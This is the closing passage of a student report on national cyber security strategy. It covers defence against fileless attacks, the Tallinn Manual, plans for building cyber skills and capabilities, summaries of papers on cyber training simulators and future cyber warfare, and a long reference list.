[Fig 7.8C] (PAUL STAMP, 2017)

- Endgame SOC platform, Kernel level analysis is deployed to read every shell execution and prevent the execution when malicious code is detected, this also gives complete visibility of the attack exposing the source making it easier for administrators to patch the vulnerability> This platform also conducts in- memory analysis. (ENDGAME, 2017)

In minimizing the risk of an organization being affected from this type of attack, it is advised that permissions are closely managed, and employees are given the rights for exactly what they require to do, this ensures that attackers would need to target

34 | Page

employees who hold the appropriate root privileges to execute the code correctly, the organization can focus more of their training and education to those individuals meaning they are less likely to expose themselves. (BUTTLER, P., 2017)

35 | Page

5. The Tallinn Manual

The Tallinn Manual was developed as part of them NATO Cooperative Cyber Defence Centre of Excellence by a group of international experts of about 20 experts in 2013, it was originally titled Tallinn Manual on the International Law Applicable to Cyber Warfare but was later amended due to relating to not only cyberwarfare but cyber conflicts within sectors of industry.

Overall it relates to the operations and legalities within the cyber ‘realm’, it aims to provide and promote clarity for the different functionalities of cyber networking and is designed to define what is acceptable and what is not when operating within this environment.

The 642-page document includes a dissection and analysis of current global legal fundamentals that arise in cyber operations and how each is applicable to a different scenario, it simply demonstrates the complexities and ‘blurred lines’ that pollute the cyber environments.

Certain threats and attacks are scenarios are identified within the document, these are then theorised with recommendations and prospective actions when it comes to altercations between different countries, examples are given to illustrate the power a nation can have over another nation state when In the power of cyber dominance, the top powers of the world can bully those beneath them to comply with actions that were not regulatory before this, prior to this paper, there was not clear and set response to an attack making it very difficult for those on the receiving end to react.

The following nations, as of 2017, are sponsoring Participating of the NATO Cooperative Cyber Defence Centre of Excellence; Belgium, the Czech Republic, Estonia, United States, France, Netherlands, Italy, Germany, Greece, Hungary, United Kingdom, Latvia, Lithuania, Poland, Slovakia, Spain and Turkey.

36 | Page

6. Development

Nation-A must acquire the appropriate tools and capabilities to protect against the cyber threat that will be evolving further after the time of writing of this report; (PORCHE, I.R.I., 2018)

• Development of talented individuals

o Schools and early learner programs o CCC (Children Cyber Challenge) o Higher Learning Apprentice Opportunities o Post Graduate Specialist Training o Teacher further development o Training for Armed Forces roles o Digital and Cyber skills study integrated in schools • Investment opportunities for new E-Companies, ongoing support for cyber capabilities

o Appropriate application processes for funding and growth o Private sector growth o Ongoing funding for research and development towards new ideologies and tools • International Action

o Continued clarification of international law o Cooperation and cohesion with international law enforcement o Drafting and provisioning of international technical standards o Governance of emerging technologies o International encryption policies to promote ‘default’ configurations o Cyber partnerships within organizations like UN and NATO

Development and planning can benefit governments and progress towards the current objectives;

• Effective detection and investigation of malicious cyber activities • Reduction in international cybercrime, eliminating local regulation loopholes

37 | Page

• Capability to manage and respond to cyber incidents effectively • Creation of sustainable home-grown talented individuals • Development of future technologies

Training and education needs to be adapted appropriately to suit the evolution of cyber threats that currently faced and hereafter, within the training programs for the development of future security professionals.

6.1. Further Documentation Use of Simulation to Achieve Better Results in Cyber Military Training

DOI: 10.1109/MILCOM.2015.7357620

This Document addresses the topic of how future cyber professionals are going to be trained with the complexity of cyber technologies and the evolving threat. Relating to the Brazilian armed forces cyber command, the case study analyses the advantages and disadvantages of for the use of simulators in the training and to present it’s relevant recommendations.

Introduction of Cyber Simulators such as

o Cyber Protect o MAADNET o CRIAB o SIMOC

SIMOC (Cyber Operations Simulator) had been selected to undertake the simulations within the experiments, the following benefits were derived;

o Creation of Network Scenarios o Multiple types of training o Re-use attributes o Virtual Machine Support o Mix Networks Support o Automated Processes o Real-Time Monitoring o Logging

38 | Page

o FairSecurity Controls

Along with the benefits, some disadvantages to the SIMOC simulator had been identified

o No virtualization of military assets o No virtualization of Operating Systems o No Malware detection system

eWar - Reality of Future Wars

DOI: 10.1145/2492517.2500321

- This report is explaining the future of cyber warfare and the development in the types of attacks that are being forecasted, published in the IEEE database in April of 2014, It was originally published in ASONAM (Advances in Social Networks Analysis and Mining) in 2013. It has a detailed explanation of current and future technologies that could be used to fight a cyber war, this can help when creating a cyber security strategy when trying to identify future threats.

- The publication of the paper was in response to the conference that took place in Niagara Falls regarding ASONAM, having 3 credited authors, Gorazd Prapotnik (Faculty of Criminal Justice and Security, University of Maribor, Slovenia), Teodora Ivanusa (Professor at University of Maribor, Slovenia) and Iztok Podbregar (Professor at University of Maribor, Slovenia), it is quite a credible source. All the papers that are published on IEEE go through a peer review system to ensure the reference are of the highest standard.

- This paper is in aid of completing Objective C, along with including the development of cyber weaponry over the years, there is a progression of different types of warfare and how warfare in cyber, particularly, is being developed to act as a new vector of attack, explaining the types of cyber warfare such as, out & out cyber war such as Stuxnet, iWar, Cyber espionage, Botnet network and so on…

39 | Page

7. References

API Research, 2017. Digitization of Operational Technologies to Drive Transportation Cybersecurity Spending to $14 Billion by 2022. Plus Company Updates, Jul 4, ASSAF DAHAN, 2017. Cybereason Discovers Large-scale Corporate Espionage Hacking Operation. PRWeb Newswire, May 24, B HASHIM, M.S., 2011. Malaysia's National Cyber Security Policy: The country's cyber defence initiatives. pp.1-7 BARKLY, 2017. The 2017 State of Endpoint Security Risk. [viewed 05/04/18]. Available from: https://cdn2.hubspot.net/hubfs/468115/Campaigns/2017-Ponemon-Report/barkly-2017- state-of-endpoint-security-risk-ponemon-institute-final.pdf?t=1522936160320

BBC NEWS, 2015. Medical devices vulnerable to hackers. 29 Sept, BBC, 1998. BBC - GCSE Bitesize: How to prevent computer misuse [viewed Apr 8, 2018]. Available from: http://www.bbc.co.uk/schools/gcsebitesize/ict/legal/1dataandcomputermisuserev2.shtml BUTTLER, P., 2017. What are file-less cyber attacks and how do you protect against them [viewed Apr 11, 2018]. Available from: https://thenextweb.com/contributors/2017/10/28/file-less-cyber-attacks-protect/ CANDID WUEEST, 2016. THE INCREASEDUSE OF POWERSHELL IN ATTACKS. Symantec [viewed 05/04/18]. Available from: https://www.symantec.com/content/dam/symantec/docs/security-center/whitepapers/increased-use-of-powershell-in-attacks-16-en.pdf CASO, J.S., 2014. The rules of engagement for cyber-warfare and the Tallinn Manual: A case study. IEEE, pp.252-257 CISCO, 2017. Cisco 2017 Midyear Cybersecurity Report. Cisco [viewed 19/04/18]. Available from: https://www.automation.com/pdf_articles/cisco/Cisco_2017_MCR_Embargoed_til_0720 17_5_AM_PT_8_AM_ET.pdf CORNERSTONE ADVISORS, 2006. Benchmarks and best practices for mid-size banks. The RMA Journal, May 1, 54 DANIEL MAYO, 2017. Banking ICT Spending Predictor. [viewed 26/03/18]. Available from: https://ovum.informa.com/resources/product-content/ict-banking-spending-predictor- infographic DOD, 2015. DoD cyber strategy. U.S. NavyAvailable from: https://www.defense.gov/Portals/1/features/2015/0415_cyber- strategy/Final_2015_DoD_CYBER_STRATEGY_for_web.pdf DR REBECCA KLAHR, JAYESH NAVIN SHAH and SOPHIE AMILI, 2016. Cyber Security Breaches Survey c2016 [viewed 24/04/18]. Available

40 | Page

from: https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachme nt_data/file/521465/Cyber_Security_Breaches_Survey_2016_main_report_FINAL.pdf

ENDGAME, 2017. Protect Your Memory: Endgame Stops Fileless Attacks [viewed Apr 11, 2018]. Available from: https://www.endgame.com/resource/solution-brief/pdf/protect-your- memory-endgame-stops-fileless-attacks ENISA, 2016. Enisa Threat Landscape Report 2015. [viewed 27/03/18]. Available from: https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2017 ENISA, 2018. Enisa Threat Landscape Report 2017. [viewed 27/03/18]. Available from: https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2017 FEDERAL MINISTRY OF THE INTERIOR, 2011. Cyber Security Strategy for Germanyandnbsp; Federal Ministry of the Interior Alt-Moabit 101 D 10559 Berlin: [viewed 03/03/18]. Available from: https://www.cio.bund.de/SharedDocs/Publikationen/DE/Strategische- Themen/css_engl_download.pdf?__blob=publicationFile GLANCE, D., 2015. How we trace the hackers behind a cyber attack [viewed Mar 25, 2018]. Available from: http://theconversation.com/how-we-trace-the-hackers-behind-a-cyber-attack- 51731 HMGOV, 2016. NATIONAL CYBER SECURITY STRATEGY 2016-2021 HM Government [viewed 08/02/18]. Available from: https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/567242/n ational_cyber_security_strategy_2016.pdf HMGOV, 2016. NATIONAL CYBER SECURITY STRATEGY 2016-2021andnbsp; HM Government [viewed 08/02/18]. Available from: https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/567242/n ational_cyber_security_strategy_2016.pdf HMGOV-B., 2018. Government acts to protect essential services from cyber attack. European Union News, Jan 29, IBM Issues 2017 X-Force Threat Intelligence Index Findings. 2017. ACI Information Group [viewed 15/04/18]. Available from: http://scholar.aci.info/view/1464ec3df006b730146/15b59f999d30001daedea4e INDIA ASHOK, 2017. What is Operation Cobalt Kitty? Notorious hacker unit OceanLotus Group's inner workings revealed [viewed 10/04/18 Available from: https://www.ibtimes.co.uk/what-operation-cobalt-kitty-notorious-hacker-unit-oceanlotus- groups-inner-workings-revealed-1623629 INSTITUTE, I.M., 2016. Employee Errors Cause Most Data Breach Incidents in Cyber Attacks [viewed Mar 26, 2018]. Available from: https://www.prnewswire.com/news- releases/employee-errors-cause-most-data-breach-incidents-in-cyber-attacks- 300342879.html JOHN LEYDEN, 2017. Did you know: Crimelords behind DDoS attacks offer customer loyalty points?[viewed Apr 9, 2018]. Available from: https://www.theregister.co.uk/2017/03/24/ddos_attack_business_models/

41 | Page

JOHNS HOPKINS, 2015. Medical Devices Vulnerable to Hackers, Study [viewed 15/04/18 Available from: http://scholar.aci.info/view/14c4821c94d000f000a/150248d3d4a000115d7

KIM ZETTER, 2016. That Insane, $81M Bangladesh Bank Heist? Here's What We Know [viewed Mar 27, 2018]. Available from: https://www.wired.com/2016/05/insane-81m- bangladesh-bank-heist-heres-know/ LILY HAY NEWMAN 2018 Jan, Menacing Malware Shows the Dangers of Industrial System Sabotage [viewed Mar 22, 2018]. Available from: https://www.wired.com/story/triton-malware- dangers-industrial-system-sabotage/

LILY HAY NEWMAN (b), 2018. GitHub Survived the Biggest DDoS Attack Ever Recorded [viewed Apr 7, 2018]. Available from: https://www.wired.com/story/github-ddos- memcached/ LUDLOW, P., 2013. What Is a 'Hacktivist'?[viewed Mar 27, 2018]. Available from: //opinionator.blogs.nytimes.com/2013/01/13/what-is-a-hacktivist/ MACASKILL, E., 2018. Major cyber-attack on UK a matter of 'when, not if' – security chief [viewed Apr 9, 2018]. Available from: http://www.theguardian.com/technology/2018/jan/22/cyber-attack-on-uk-matter-of- when-not-if-says-security-chief-ciaran-martin MARIA KOROLOV, 2017. What is a fileless attack? How hackers invade systems without installing software [viewed 05/04/18 Available from: https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how- hackers-invade-systems-without-installing-software.html MARSH, 2015. CYBER RISK IN THE TRANSPORTATION INDUSTRY. [viewed 23/04/18]. Available from: https://www.marsh.com/content/dam/marsh/Documents/PDF/UK- en/Cyber%20Risk%20in%20the%20Transportation%20Industry-03-2015.pdf MAURYA, S., 2015. Positive security model based server-side solution for prevention of cross-site scripting attacks. IEEE, pp.1-5 MURAT BALABAN, 2013. andnbsp; andnbsp; andnbsp; BUFFER OVERFLOWS DEMYSTIFIED [viewed 04/04.18 Available from: http://www.enderunix.org/docs/en/bof- eng.txt MYRSINI ATHINAIOU, 2017. Why Has Healthcare Become Such a Target for Cyber- Attackers? Medical Design Technology, Jul 24, NCA, 2016. NCA Strategic Cyber Industry Groupandnbsp; [viewed 12/04/18]. Available from: http://www.nationalcrimeagency.gov.uk/publications/709-cyber-crime-assessment- 2016/file NCSC, 2016. Protecting your organisation from ransomware [viewed 25/04/18 Available from: https://www.ncsc.gov.uk/guidance/protecting-your-organisation-ransomware PAUL STAMP, 2017. DEFENDING AGAINST THE FILELESS MALWARE PANDEMIC THAT'S INFECTING BANKS AROUND THE GLOBE [viewed 10/04/18 Available from: https://www.cybereason.com/blog/defending-against-the-fileless-malware-pandemic- thats-infecting-banks-around-the-globe

42 | Page

PENNY CROSMAN, 2014. How Banks Are Allocating Their Tech Budgets for 2015 [viewed Mar 26, 2018]. Available from: https://www.americanbanker.com/news/how-banks-are- allocating-their-tech-budgets-for-2015 PETERS, S., 2015. The 7 best social engineering attacks ever [viewed 5 January 2016]. Available from: http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d- id/1319411

PING, C., 2017. A second-order SQL injection detection method. IEEE, pp.1792-1796 PORCHE, I.R.I., 2018. Getting Ready to Fight the Next (Cyber) War [viewed Mar 22, 2018]. Available from: https://www.rand.org/blog/2018/03/getting-ready-to-fight-the-next-cyber- war.html PWC, 2017. PwC’s 2018 Global Economic Crime and Fraud Survey [viewed Apr 12, 2018]. Available from: https://www.pwc.com/gx/en/services/advisory/forensics/economic-crime- survey.html RAPID7, 2000. The Most Common Types of Cyber Security Attacks [viewed Mar 25, 2018]. Available from: https://www.rapid7.com/fundamentals/types-of-attacks/ RICKY PUBLICO, 2017. What is a Man-in-the-Middle Attack and How Can You Prevent It?[viewed 11/04/18 Available from: https://www.globalsign.com/en/blog/what-is-a-man-in-the- middle-attack/ ROUSE, M (B). and POSTED, 2007. What is denial of service (DoS) ? - definition from WhatIs.com [viewed 21 January 2016]. Available from: http://searchsoftwarequality.techtarget.com/definition/denial-of-service ROUSE, M. and POSTED, 2014. What is social engineering? - definition from WhatIs.com [viewed 5 January 2016]. Available from: http://searchsecurity.techtarget.com/definition/social-engineering SAHBA KAZEROONI, 2015 The Growing Threat of Denial-of-Service Attacks [viewed Apr 7, 2018]. Available from: https://www.elp.com/articles/powergrid_international/print/volume- 20/issue-2/features/the-growing-threat-of-denial-of-service-attacks.html SANDER RETEL, 2014. Cyber Security Strategy Estoniaandnbsp; [viewed 03/03/18]. Available from: SCHMITT, M.N., 2013. Tallinn manual on the international law applicable to cyber warfare. 1. publ. ed. Cambridge [u.a.]: Cambridge Univ. Press [viewed Nov 14, 2017] available from: https://www.peacepalacelibrary.nl/ebooks/files/356296245.pdf ISBN: 978-1-107-02443-4 SUSAN EVANS, 2005. SYN Flood [viewed 04/04/18 Available from: https://www.corero.com/resources/ddos-attack-types/syn-flood.html VANGIE BEAL, 2009. Denial of Service (DoS) Attacks [viewed 04/04/18 Available from: https://www.webopedia.com/DidYouKnow/Internet/DoS_attack.asp VARONIS, 2017. 3 Ways Varonis Helps You Fight Ransomware [viewed 25/04/18]. Available from: https://info.varonis.com/hubfs/docs/whitepapers/en/Varonis-Ransomware- Whitepaper.pdf?submissionGuid=c9241111-3144-4fbb-9991-9479fb817a0f

43 | Page

VERIZON, 2014. 2014 data breach investigations report / Verizon. [viewed April 04 2018] ZEIFMAN, I., 2015. DD4BC's DDoS Extortion Campaign Targets Payment Industry [viewed Apr 9, 2018]. Available from: https://www.incapsula.com/blog/dd4bc-ddos-extortion.html

44 | Page